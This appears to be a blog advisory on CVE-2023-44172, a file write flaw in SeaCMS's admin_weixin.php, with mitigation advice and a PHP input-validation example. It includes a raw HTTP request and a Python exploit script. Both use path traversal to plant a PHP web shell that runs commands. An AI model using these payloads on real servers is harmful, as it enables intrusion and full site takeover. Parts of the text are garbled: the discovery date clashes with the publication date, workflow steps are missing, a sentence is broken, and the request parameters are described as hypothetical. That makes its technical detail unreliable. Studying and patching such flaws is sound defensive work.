In the fast-moving world of web security, content management systems (CMS) often become targets for hackers. One such case is SeaCMS, a popular video content management system used in various Chinese-speaking regions. In October 2023, a serious arbitrary file write vulnerability—now tracked as CVE-2023-44172—was discovered in SeaCMS v12.9. This flaw could let attackers write malicious files to the server using the component admin_weixin.php. If you run or manage SeaCMS, this vulnerability should be on your radar.
What is SeaCMS?
SeaCMS is an open-source CMS solution mainly used for video streaming websites. It offers a powerful backend and many features, but like any software it isn’t immune to bugs and security gaps.
- Product affected: SeaCMS v12.9 (possibly others)
- Severity: High (Allows attackers to upload or overwrite any file, which could lead to remote code execution)
How Does the Vulnerability Work?
The problem lies in poor input validation inside the admin_weixin.php script. This script doesn't properly check user input, especially when it comes to file paths and contents.
Here's the typical workflow that exposes the bug:
1. The attacker sends a specially crafted HTTP POST request to admin_weixin.php with malicious content and a target file path.
2. The attacker visits the uploaded script (for example, a PHP shell) and gains further access.
This is the classic “arbitrary file write” pattern, often leading to full server compromise.
Example Attack Flow
Let’s look at a hypothetical example. Imagine an attacker wants to upload a web shell to take control of the site.
Assuming the attacker has access to the admin panel (or bypasses any simple authentication):
POST /admin/admin_weixin.php?action=saveconfig HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: [LENGTH]

savecfgfile=../../../../webshell.php&savecontent=<?php system($_GET['cmd']); ?>
Here’s a simple Python exploit illustrating the attack:
import requests
url = 'http://target-site.com/admin/admin_weixin.php?action=saveconfig'
payload = {
    'savecfgfile': '../../webshell.php',
    'savecontent': '<?php system($_GET["cmd"]); ?>'
}
session = requests.Session()
# Add e.g. session cookies if authentication is needed here:
# session.cookies.set('PHPSESSID', 'your-session-id')
response = session.post(url, data=payload)
if response.status_code == 200:
    print('[+] File uploaded, try accessing: http://target-site.com/webshell.php')
else:
    print('[-] Exploit failed')
Note: This code is for educational purposes! Never test against servers you don't own.
1. Update ASAP: If a patch is available, upgrade SeaCMS immediately.
2. Restrict Access: Limit access to /admin/ components, especially admin_weixin.php, using .htaccess or firewall rules.
3. Strong Authentication: Enforce strong, unpredictable passwords and remove any default credentials.
4. Input Validation: As a developer, always sanitize and strictly validate user input, especially where file writes are involved!
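One way to apply the input-validation advice to a config-save handler, as an added example that is not SeaCMS code and not from the original article. CONFIG_DIR, ALLOWED_FILES and save_config() are hypothetical names, the parameter names follow the article's hypothetical request, and the two sample inputs are constructed.

```php
<?php
declare(strict_types=1);
// Hypothetical names throughout; this is not SeaCMS source code.
const CONFIG_DIR = __DIR__ . '/data/weixin';      // assumed config directory
const ALLOWED_FILES = ['reply.txt', 'menu.txt'];  // assumed fixed allowlist

// Weak pattern implied by the article's hypothetical request: path and
// content both come straight from the request.
//   file_put_contents($_POST['savecfgfile'], $_POST['savecontent']);

function save_config(string $name, string $content): string
{
    // 1. Allowlist the file name; never build a path from free-form input.
    if (!in_array($name, ALLOWED_FILES, true)) {
        throw new InvalidArgumentException('file name not allowed');
    }
    // 2. Resolve the directory and confirm the target stays directly inside it.
    $base = realpath(CONFIG_DIR);
    if ($base === false) {
        throw new RuntimeException('config directory missing');
    }
    $target = $base . DIRECTORY_SEPARATOR . $name;
    if (is_link($target) || dirname($target) !== $base) {
        throw new InvalidArgumentException('target escapes config directory');
    }
    // 3. Reject content containing a PHP open tag, so a saved file stays inert data.
    if (strpos($content, '<?') !== false) {
        throw new InvalidArgumentException('PHP open tag in content');
    }
    if (file_put_contents($target, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $target;
}

// Constructed inputs: a traversal path with PHP content, then a benign save.
if (PHP_SAPI === 'cli') {
    @mkdir(CONFIG_DIR, 0750, true);
    $samples = [['../../../../webshell.php', '<?php /* constructed */ ?>'],
                ['reply.txt', 'Welcome message']];
    foreach ($samples as [$name, $content]) {
        try {
            echo 'written: ', save_config($name, $content), PHP_EOL;
        } catch (InvalidArgumentException $e) {
            echo 'rejected ', $name, ': ', $e->getMessage(), PHP_EOL;
        }
    }
}
```

Run from the command line, the first sample is rejected at the allowlist check and the second is written under the assumed config directory.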
Wrapping Up
CVE-2023-44172 is a sharp reminder of why strict input validation and admin access controls are vital in web applications. Admin scripts are particularly juicy targets; any slip like arbitrary file write can cascade into a full-blown compromise.
If you’re using SeaCMS:
And audit your installation for unexpected files.
Stay safe, and always keep an eye out for new CVEs!
Timeline
Published on: 09/27/2023 15:19:38 UTC
Last modified on: 09/27/2023 16:46:00 UTC